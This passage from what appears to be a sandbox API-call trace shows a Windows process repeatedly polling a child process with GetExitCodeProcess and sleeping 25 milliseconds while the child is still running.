lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.704] Sleep (dwMilliseconds=0x19) [0230.739] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.739] Sleep (dwMilliseconds=0x19) [0230.813] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.813] Sleep (dwMilliseconds=0x19) [0230.862] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.862] Sleep (dwMilliseconds=0x19) [0230.902] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.902] Sleep (dwMilliseconds=0x19) [0230.937] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.937] Sleep (dwMilliseconds=0x19) [0230.974] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0230.974] Sleep (dwMilliseconds=0x19) [0231.014] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.015] Sleep (dwMilliseconds=0x19) [0231.058] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.058] Sleep (dwMilliseconds=0x19) [0231.096] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.096] Sleep (dwMilliseconds=0x19) [0231.132] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.132] Sleep (dwMilliseconds=0x19) [0231.203] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.203] Sleep (dwMilliseconds=0x19) [0231.337] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.337] Sleep (dwMilliseconds=0x19) [0231.427] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.427] Sleep (dwMilliseconds=0x19) [0231.472] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.472] Sleep (dwMilliseconds=0x19) [0231.506] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.507] Sleep (dwMilliseconds=0x19) [0231.545] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.545] Sleep (dwMilliseconds=0x19) [0231.572] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.572] Sleep (dwMilliseconds=0x19) [0231.608] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.608] Sleep (dwMilliseconds=0x19) [0231.635] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.635] Sleep (dwMilliseconds=0x19) [0231.668] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.669] Sleep (dwMilliseconds=0x19) [0231.697] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.697] Sleep (dwMilliseconds=0x19) [0231.747] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.748] Sleep (dwMilliseconds=0x19) [0231.944] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0231.944] Sleep (dwMilliseconds=0x19) [0232.022] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.022] Sleep (dwMilliseconds=0x19) [0232.104] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.104] Sleep (dwMilliseconds=0x19) [0232.158] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.158] Sleep (dwMilliseconds=0x19) [0232.194] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.195] Sleep (dwMilliseconds=0x19) [0232.230] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.230] Sleep (dwMilliseconds=0x19) [0232.395] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.395] Sleep (dwMilliseconds=0x19) [0232.441] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.441] Sleep (dwMilliseconds=0x19) [0232.476] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.476] Sleep (dwMilliseconds=0x19) [0232.510] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.510] Sleep (dwMilliseconds=0x19) [0232.592] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.592] Sleep (dwMilliseconds=0x19) [0232.662] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.662] Sleep (dwMilliseconds=0x19) [0232.700] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.700] Sleep (dwMilliseconds=0x19) [0232.734] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.734] Sleep (dwMilliseconds=0x19) [0232.781] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.781] Sleep (dwMilliseconds=0x19) [0232.825] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.825] Sleep (dwMilliseconds=0x19) [0232.878] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.879] Sleep (dwMilliseconds=0x19) [0232.913] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.913] Sleep (dwMilliseconds=0x19) [0232.949] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.949] Sleep (dwMilliseconds=0x19) [0232.983] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0232.983] Sleep (dwMilliseconds=0x19) [0233.025] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.025] Sleep (dwMilliseconds=0x19) [0233.061] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.062] Sleep (dwMilliseconds=0x19) [0233.099] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.099] Sleep (dwMilliseconds=0x19) [0233.139] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.139] Sleep (dwMilliseconds=0x19) [0233.198] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.198] Sleep (dwMilliseconds=0x19) [0233.239] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.239] Sleep (dwMilliseconds=0x19) [0233.322] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.322] Sleep (dwMilliseconds=0x19) [0233.363] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.363] Sleep (dwMilliseconds=0x19) [0233.405] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.405] Sleep (dwMilliseconds=0x19) [0233.440] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.440] Sleep (dwMilliseconds=0x19) [0233.474] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.474] Sleep (dwMilliseconds=0x19) [0233.548] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.548] Sleep (dwMilliseconds=0x19) [0233.584] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.585] Sleep (dwMilliseconds=0x19) [0233.619] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.619] Sleep (dwMilliseconds=0x19) [0233.663] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.663] Sleep (dwMilliseconds=0x19) [0233.694] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.694] Sleep (dwMilliseconds=0x19) [0233.730] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.730] Sleep (dwMilliseconds=0x19) [0233.757] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.757] Sleep (dwMilliseconds=0x19) [0233.921] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.922] Sleep (dwMilliseconds=0x19) [0233.956] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.956] Sleep (dwMilliseconds=0x19) [0233.990] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0233.990] Sleep (dwMilliseconds=0x19) [0234.033] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0234.034] Sleep (dwMilliseconds=0x19) [0234.101] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0234.101] Sleep (dwMilliseconds=0x19) [0234.260] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0234.260] Sleep (dwMilliseconds=0x19) [0234.374] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0234.374] Sleep (dwMilliseconds=0x19) [0234.448] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0234.448] Sleep (dwMilliseconds=0x19) [0234.484] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0234.484] Sleep (dwMilliseconds=0x19) [0234.552] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0234.552] Sleep (dwMilliseconds=0x19) [0234.592] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0234.592] Sleep (dwMilliseconds=0x19) [0234.627] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0234.627] Sleep (dwMilliseconds=0x19) [0234.695] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0234.695] Sleep (dwMilliseconds=0x19) [0234.767] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0234.767] Sleep (dwMilliseconds=0x19) [0234.869] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0234.869] Sleep (dwMilliseconds=0x19) [0234.930] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0234.931] Sleep (dwMilliseconds=0x19) [0235.015] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.016] Sleep (dwMilliseconds=0x19) [0235.055] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.055] Sleep (dwMilliseconds=0x19) [0235.096] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.096] Sleep (dwMilliseconds=0x19) [0235.166] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.166] Sleep (dwMilliseconds=0x19) [0235.205] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.205] Sleep (dwMilliseconds=0x19) [0235.275] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.275] Sleep (dwMilliseconds=0x19) [0235.354] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.354] Sleep (dwMilliseconds=0x19) [0235.394] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.394] Sleep (dwMilliseconds=0x19) [0235.431] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.431] Sleep (dwMilliseconds=0x19) [0235.467] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.467] Sleep (dwMilliseconds=0x19) [0235.506] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.506] Sleep (dwMilliseconds=0x19) [0235.563] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.563] Sleep (dwMilliseconds=0x19) [0235.606] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.606] Sleep (dwMilliseconds=0x19) [0235.673] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.674] Sleep (dwMilliseconds=0x19) [0235.715] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.715] Sleep (dwMilliseconds=0x19) [0235.771] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.771] Sleep (dwMilliseconds=0x19) [0235.826] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.826] Sleep (dwMilliseconds=0x19) [0235.860] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.860] Sleep (dwMilliseconds=0x19) [0235.927] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.927] Sleep (dwMilliseconds=0x19) [0235.963] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.963] Sleep (dwMilliseconds=0x19) [0235.999] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0235.999] Sleep (dwMilliseconds=0x19) [0236.093] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0236.093] Sleep (dwMilliseconds=0x19) [0236.221] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0236.221] Sleep (dwMilliseconds=0x19) [0236.388] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0236.389] Sleep (dwMilliseconds=0x19) [0236.448] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0236.448] Sleep (dwMilliseconds=0x19) [0236.483] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0236.484] Sleep (dwMilliseconds=0x19) [0236.518] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0236.518] Sleep (dwMilliseconds=0x19) [0236.608] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0236.608] Sleep (dwMilliseconds=0x19) [0236.644] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0236.644] Sleep (dwMilliseconds=0x19) [0236.730] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0236.731] Sleep (dwMilliseconds=0x19) [0236.820] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0236.820] Sleep (dwMilliseconds=0x19) [0236.904] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0236.904] Sleep (dwMilliseconds=0x19) [0236.938] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0236.938] Sleep (dwMilliseconds=0x19) [0236.979] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0236.979] Sleep (dwMilliseconds=0x19) [0237.023] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.023] Sleep (dwMilliseconds=0x19) [0237.150] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.150] Sleep (dwMilliseconds=0x19) [0237.223] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.223] Sleep (dwMilliseconds=0x19) [0237.257] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.257] Sleep (dwMilliseconds=0x19) [0237.347] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.347] Sleep (dwMilliseconds=0x19) [0237.383] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.383] Sleep (dwMilliseconds=0x19) [0237.417] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.417] Sleep (dwMilliseconds=0x19) [0237.453] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.453] Sleep (dwMilliseconds=0x19) [0237.487] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.487] Sleep (dwMilliseconds=0x19) [0237.526] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.526] Sleep (dwMilliseconds=0x19) [0237.582] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.582] Sleep (dwMilliseconds=0x19) [0237.620] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.620] Sleep (dwMilliseconds=0x19) [0237.702] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.702] Sleep (dwMilliseconds=0x19) [0237.743] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.743] Sleep (dwMilliseconds=0x19) [0237.777] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.778] Sleep (dwMilliseconds=0x19) [0237.813] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.813] Sleep (dwMilliseconds=0x19) [0237.862] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.862] Sleep (dwMilliseconds=0x19) [0237.914] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.914] Sleep (dwMilliseconds=0x19) [0237.948] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.948] Sleep (dwMilliseconds=0x19) [0237.986] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0237.986] Sleep (dwMilliseconds=0x19) [0238.212] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0238.213] Sleep (dwMilliseconds=0x19) [0238.261] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0238.261] Sleep (dwMilliseconds=0x19) [0238.365] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0238.365] Sleep (dwMilliseconds=0x19) [0238.402] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0238.403] Sleep (dwMilliseconds=0x19) [0238.452] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0238.453] Sleep (dwMilliseconds=0x19) [0238.503] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0238.503] Sleep (dwMilliseconds=0x19) [0238.538] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0238.538] Sleep (dwMilliseconds=0x19) [0238.571] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0238.571] Sleep (dwMilliseconds=0x19) [0238.633] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0238.633] Sleep (dwMilliseconds=0x19) [0238.745] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0238.745] Sleep (dwMilliseconds=0x19) [0238.780] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0238.780] Sleep (dwMilliseconds=0x19) [0238.825] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0238.825] Sleep (dwMilliseconds=0x19) [0238.860] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0238.861] Sleep (dwMilliseconds=0x19) [0238.916] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0238.917] Sleep (dwMilliseconds=0x19) [0238.953] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0238.953] Sleep (dwMilliseconds=0x19) [0239.020] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0239.020] Sleep (dwMilliseconds=0x19) [0239.064] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0239.064] Sleep (dwMilliseconds=0x19) [0239.112] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0239.113] Sleep (dwMilliseconds=0x19) [0239.161] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0239.162] Sleep (dwMilliseconds=0x19) [0239.196] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0239.196] Sleep (dwMilliseconds=0x19) [0239.231] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0239.231] Sleep (dwMilliseconds=0x19) [0239.310] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0239.310] Sleep (dwMilliseconds=0x19) [0239.403] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0239.403] Sleep (dwMilliseconds=0x19) [0239.438] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0239.438] Sleep (dwMilliseconds=0x19) [0239.473] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0239.474] Sleep (dwMilliseconds=0x19) [0239.542] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0239.542] Sleep (dwMilliseconds=0x19) [0239.664] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0239.664] Sleep (dwMilliseconds=0x19) [0239.794] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0239.794] Sleep (dwMilliseconds=0x19) [0239.894] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0239.894] Sleep 